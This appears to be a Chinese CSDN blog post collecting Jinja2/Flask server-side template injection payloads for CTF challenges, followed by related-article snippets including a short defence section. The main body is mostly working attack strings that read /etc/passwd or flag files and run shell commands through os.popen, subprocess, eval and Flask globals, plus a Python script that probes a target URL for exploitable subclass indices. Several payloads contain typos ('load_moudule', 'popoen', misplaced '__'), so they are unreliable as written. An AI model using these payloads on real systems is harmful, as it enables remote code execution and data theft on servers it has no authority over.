基于SSTI模块注入的常用payload总结

最新推荐文章于 2025-03-05 12:00:35 发布
最新推荐文章于 2025-03-05 12:00:35 发布
阅读量1.8k 收藏 16
点赞数 5
分类专栏: web SSTI Python 文章标签: SSTI模块注入 Python CTF 网络安全 web payload
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Myon5/article/details/131548888
版权

写在前面:

(1)下面payload中的__mro__[2]有时候需要换成__base__ (但是我遇到的还是前者多些),具体用哪个取决于题目环境的实际情况;

(2)payload中的xx代表我们所要利用的类或者函数所在位置,即我们通过脚本跑出来的类或者函数所在的位置;

(3)关于爆破的脚本请参考我前面的博客【http://t.csdn.cn/ygvBK】,这里主要是总结payload 。

目录

一、查找函数位置,利用函数实现

1、利用file函数进行读取

2、利用内嵌函数eval进行命令执行

3、利用linecache函数进行命令执行

二、查找类的位置,利用类下的函数实现

1、利用_frozen_importlib_external.FileLoader类

2、利用importlib类进行命令执行

3、利用subprocess.Popen类进行命令执行

三、利用os模块进行命令执行

1、利用config

2、利用url_for

3、利用子类的os模块

四、关于其他的利用

1、利用lipsum执行命令

2、读取配置文件中的FLAG

3、利用warnings.catch_warnings 进行命令执行

4、利用 _ _ import _ _ 进行命令执行

5、 利用任意字符串或特殊变量

一、查找函数位置,利用函数实现

1、利用file函数进行读取

{{''.__class__.__mro__[2].__subclasses__()[xx].__init__.__globals__['__builtins__']['file']('/etc/passwd').read()}}

2、利用内嵌函数eval进行命令执行

{{''.__class__.__mro__[2].__subclasses__()[xx].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("whoami").read()')}}

3、利用linecache函数进行命令执行

{{''.__class__.__mro__[2]__.__subclasses__()[xx].__init__.__globals__['linecache']['os'].popen('ls').read()}}

二、查找类的位置,利用类下的函数实现

1、利用_frozen_importlib_external.FileLoader类

(该类下的get_data函数进行读取)

{{''.__class__.__mro__[2].__subclasses__()[xx]["get_data"](0,"/etc/passwd")}}

2、利用importlib类进行命令执行

(该类下的load_module可以引用os)

{{''.__class__.__mro__[2]__.__subclasses__()[xx]['load_moudule']("os")["popen"]("ls").read()}}

3、利用subprocess.Popen类进行命令执行

{{''.__class__.__mro[2]__.__subclasses__()[xx]('ls',shell=True,stdout=-1).communicate()[0].strip()}}

三、利用os模块进行命令执行

即在其他函数中直接掉用os模块来执行os.popen()

1、利用config

{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}

2、利用url_for

{{url_for.__globals__['os'].popen('ls').read()}}
cycler               {{cycler.__init__.__globals__.os.popen('id').read()}}
joiner               {{joiner.__init__.__globals__.os.popen('id').read()}}
namespace            {{namespace.__init__.__globals__.os.popen('id').read()}}

3、利用子类的os模块

查找含有os模块的子类:

import requests
url = ""
for i in range(500):
    data = {
        "parms": "{{''.__class__.__mro__[2]__.__subclasses__()[{}].__init__.__globals__}}".format(str(i))
    }#传入的参数,根据事实情况更改参数的名称
    try:
        re = requests.get(url=url,params=data).text
        if 'os.py' in re:
            print(i,data["parms"])
    except:
        pass
{{''.__class__.__mro__[2]__.__subclasses__()[xx].__init__.__globals__['os'].popoen('ls').read()}}

四、关于其他的利用

1、利用lipsum执行命令

{{lipsum.__globals__['os']['popen']('ls').read()}}

2、读取配置文件中的FLAG

{{url_for.__globals__['current_app'].config.FLAG}}
{{get_flashed_messages.__globals__['current_app'].config.FLAG}}

3、利用warnings.catch_warnings 进行命令执行

[c for c in ().__class__.__base__.__subclasses__() if c.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os').popen('whoami').read()

4、利用 _ _ import _ _ 进行命令执行

{}.__class__.__bases__[0].__subclasses__()[xx].__init__.__globals__['__builtins__']['__import__']('commands').getstatusoutput('ls')

{}.__class__.__bases__[0].__subclasses__()[xx].__init__.__globals__['__builtins__']['__import__']('os').system('ls')

{}.__class__.__bases__[0].__subclasses__()[xx].__init__.__globals__.__builtins__.__import__('os').popen('id').read()

5、 利用任意字符串或特殊变量

{{sss.__init__.__globals__.__builtins__.open("/flag").read()}}
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
{{request.application.__globals__['__builtins__']['__import__']('os').popen('ls').read()}}

可以看到上面很多payload中都有popen函数,实质还是对popen函数的利用,因此我们在使用脚本爆破时一定要尝试popen函数。

网络安全 | 1.5w字总结】SSTI漏洞入门
等风来
08-24 1万+
SSTI(Server-Side Template Injection)是一种服务器端模板注入漏洞,它出现在使用模板引擎的Web应用程序中。模板引擎是一种将动态数据与静态模板结合生成最终输出的工具。然而,如果在构建模板时未正确处理用户输入,就可能导致SSTI漏洞的产生。sql注入的成因是:当后端脚本语言进行数据库查询时,可以构造输入语句来进行拼接,从而实现恶意sql查询。
PHP中的SSTI模板注入——Twig、Smarty、Blade
m0_61506558的博客
10-13 2017
最近接触到了SSTI注入的考点,里面涉及的内容比较杂,和SQL注入一样,影响的面较广,打算先从PHP模块注入开始,一步步深入学习。(一)TwigTwig是来自于Symfony的模版引擎,它非常易于安装和使用。Twig使用一个加载器 loader(Twig_Loader_Array) 来定位模板,以及一个环境变量environment(Twig_Environment) 来存储配置信息。
SSTIpayload构造思路
shawdow_bug的博客
04-24 2269
内置的方法和属性 有些对象类型内置了一些可读属性,它们不会被dir()列举出来。 属性/方法 描述 instance._class_ 类实例所属的类 class._bases_ 类对象(类也是对象)的基类元组 definition._name_ 类、函数、方法、描述符或生成器实例的名称。 class._mro_ 此属性是在方法解析期间查找基类时考虑的类元组。 class._subclasses_() 每个类都保留一个对其直接子类的弱引用列表。此方法返回所有仍然存活的引用的列表
模板注入漏洞(SSTI)学习笔记
小白的博客
03-05 1192
模板引擎用于将动态数据渲染到静态页面(如 HTML)。例如,Jinja2(Python)、Twig(PHP)等。
SSTI常用payload
weixin_45649612的博客
10-11 623
命令执行 exp:目录读取 {{config.class.init.globals[‘os’].popen(‘ls …/’).read()}} 文件读取 exp:读取该目录app/flag的文件 {{config.class.init.globals[‘os’].popen(‘cat /app/flag’).read() }}
SSTI详解 一文了解SSTI和所有常见payload 以flask模板为例
闵行小鱼塘
10-13 6059
做的ctf题里有好几道跟SSTI有关,故对SSTI进行学习,在此做个小结与记录
【模板注入SSTI命令执行payload分析
4ut15m's blog
02-09 3936
SSTI基础 网上有关SSTI基础的文章很多,写的好的文章也有.下面给出一篇文章,本文不再细讲基础. <<从零学习flask模板注入>>@和蔼的杨小二 命令执行 要想执行命令便需要有可以执行命令的模块,一般来说很容易想到的模块便是os. 这里先看一个payload ''.__class__.__mro__[2].__subclasses__()[71].__in...
各个模板注入PAYLOAD
snowlyzz的博客
05-02 791
1、 模板引擎介绍 1.1 模板引擎介绍 在MVC的设计模式下,一般从 Model 层中读取数据,然后将数据传到 View 层渲染(渲染成 HTML 文件),而 View 层一般都会用到模板引擎。 模板引擎包含了各种参数,并能够由模板处理系统通过识别某些特定语法来替换这些参数的文档,用来生成输出文本(HTML网页,电子邮件,配置文件,源代码等)。 模板专注于如何展现数据,而在模板之外可以专注于要展示什么数据。模板引擎可以让网站程序实现界面与数据分离,业务代码与逻辑代码分离,这样提升了开发效.
探索 SSTI 攻击payload库:Payloadbox 的 SSTI Payloads
gitblog_00036的博客
04-17 404
探索 SSTI 攻击payload库:Payloadbox 的 SSTI Payloads ssti-payloads???? Server Side Template Injection Payloads项目地址:https://gitcode.com/gh_mirrors/ss/ssti-payloads 在这个数字化的时代,安全是任何在线服务的基石。软件供应链中的漏洞(如 Server-Side...
SSTI(模块注入)的简单学习
dbabs的博客
02-05 780
SSTI即服务端模版注入攻击。由于程序员代码编写不当,导致用户输入可以修改服务端模版的执行逻辑,从而造成XSS,任意文件读取,代码执行等一系列问题。
SSTI模板注入及绕过姿势(基于Python-Jinja2)
热门推荐
Y4tacker的博客
08-02 1万+
http://xmctf.top:8962/?name={{%22%22[%22\x5f\x5fclass\x5f\x5f%22]["\x5F\x5Fbase\x5F\x5F"]["\x5F\x5Fsubclasses\x5F\x5F"]()[233]["\x5F\x5Finit\x5F\x5F"]["\x5F\x5Fglobals\x5F\x5F"]["\x5F\x5Fbuiltins\x5F\x5F"]['eval']("\x5F\x5Fimport\x5F\x5F('os'))")}}
ssti-payloadSSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).conc
ssti-payloads::bullseye:服务器端模板注入有效负载
04-13
服务器端模板注入有效负载 服务器端模板注入是指攻击者能够使用本机模板语法将恶意有效载荷注入模板中,然后在服务器端执行该模板。 模板引擎旨在通过将固定模板与易失性数据结合来生成网页。 当用户输入直接连接到模板中而不是作为数据传递时,可能会发生服务器端模板注入攻击。 这使攻击者可以注入任意模板指令以操纵模板引擎,从而经常使攻击者能够完全控制服务器。 顾名思义,服务器端模板注入有效负载是在服务器端交付和评估的,这可能使它们比典型的客户端模板注入更加危险。 影响 : 服务器端模板注入漏洞可能使网站遭受各种攻击,具体取决于所讨论的模板引擎以及应用程序使用它的方式。 在某些罕见情况下,这些漏洞不会带来真正的安全风险。 但是,在大多数情况下,服务器端模板注入的影响可能是灾难性的。 在规模最大的一端,攻击者可以潜在地实现远程代码执行,完全控制后端服务器,并使用它对内部基础结构执行其他攻击。 即使
ctf ssti 各种payload与绕过(后续会补充 绕过)
m0_59855041的博客
06-07 864
_class__ 返回一个实例所属的类__mro__ 查看类继承的所有父类,直到object__subclasses__() 获取一个类的子类,返回的是一个列表__bases__ 返回一个类直接所继承的类(元组形式)__init__ 类实例创建之后调用, 对当前对象的实例的一些初始化__globals__ 使用方式是 函数名.__globals__,返回一个当前空间下能使用的模块,方法和变量的字典,与func_globals等价。
2025.2.8——二、Confusion1 SSTI模板注入|Jinja2模板
2402_87387800的博客
02-10 968
题目来源:攻防世界 Confusion1。
SSI常用payload收集
Fly_鹏程万里
08-13 298
A、显示服务器端环境变量<#echo> 本文档名称: <!–#echo var="DOCUMENT_NAME"–> 现在时间: <!–#echo var="DATE_LOCAL"–> 显示IP地址: <! #echo var="REMOTE_ADDR"–> B、将文本内容直接插入到文档中<#include> ...
SSTI-payload和各种绕过方法
qq_44418229的博客
07-25 1968
SSTI总结:流程和绕过
《附件》--- SSTI的无脑找的,没有知识含量的payload
Zero_Adam的博客
02-09 319
我把能搜过来的payload都搜过来,,,, 碰到题再说吧,,,这payload太多了啊。。。 这个模板可以用来现找payload 自己再改一改就好了 {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__init__.__globals__.values() %} {% if b.__class__ == {}.__class__ .
CTF ssti零基础(一) 模块注入payload
2301_81040377的博客
07-24 676
这里先推荐一个还不错的工具命令还是挺多的有点像sqlmap但是这个暴力多了不用加那么多的参数支持的模板引擎但是利用工具梭哈是没有灵魂的,我的ssti也比较烂所以现在开始学先起一个flask环境写个文件app.py成功,那么继续。
ssti漏洞
最新发布
03-16
### SSTI漏洞原理 服务器端模板注入(Server-Side Template Injection, SSTI)是一种安全漏洞,允许攻击者通过控制模板输入参数,在服务器端模板引擎中执行恶意代码[^3]。这种漏洞通常发生在开发者未对用户输入进行适当过滤的情况下。 #### 漏洞形成原因 当模板引擎直接将未经验证的用户输入嵌入到模板字符串中时,可能会引发SSTI漏洞。例如,某些框架(如Python中的Jinja2)支持动态模板渲染功能,如果开发者错误地实现了如下危险代码: ```python template_str = f"Welcome, {user_input}" output = Template(template_str).render() ``` 上述代码片段中,`user_input`是由外部传入的数据,而该数据并未经过任何安全性处理就直接用于构建模板字符串。一旦攻击者能够操控此输入字段,则可能向其中插入恶意指令以触发远程代码执行或其他危害行为[^5]。 --- ### 防御措施 针对SSTI漏洞的有效防护手段主要包括以下几个方面: 1. **严格校验与清理用户提交的内容** 对所有来自客户端请求的数据都需进行全面细致地检查以及必要的转义操作,从而杜绝非法字符或者潜在有害语句混入最终形成的HTML页面之中[^4]。 2. **采用白名单机制限定可接受参数范围** 只允许预定义好的选项作为合法值参与后续业务逻辑运算过程;对于超出规定之外的选择一律拒绝受理. 3. **禁用复杂表达式的解析能力** 如果没有必要的话,应该关闭那些能够让脚本解释器理解并运行任意命令的功能开关。比如在配置文件里设置 `autoescape=True`, 这样就可以自动给所有的变量加上 HTML 转义标记: ```python from jinja2 import Environment, select_autoescape env = Environment(autoescape=select_autoescape(['html', 'xml'])) template = env.from_string('<b>{{ name }}</b>') print(template.render(name='<script>alert(1)</script>')) # 输出:<b><script>alert(1)</script></b> ``` 4. **最小化权限原则管理资源访问权** 确保只有真正需要的人才可以接触到敏感部位的信息资产,包括但不限于源码库、部署环境等等重要环节. 5. **定期更新依赖组件至最新稳定版本** 关注官方发布的补丁公告及时修复已知缺陷问题,减少因第三方库存在安全隐患而导致整体系统面临风险的可能性. --- ### 结论 综上所述,SSTI 是一种非常严重的 Web 应用层面上的安全隐患形式之一,它不仅可以让入侵者轻易获取目标主机上的机密资料甚至完全掌控整个网络架构体系结构,而且还会造成难以估量经济损失和社会影响后果严重程度不言自明。因此我们必须高度重视起来采取切实可行的技术方案加以防范遏制此类事件再次发生几率降到最低水平线上去努力奋斗前行之路永无止境!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

My6n

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值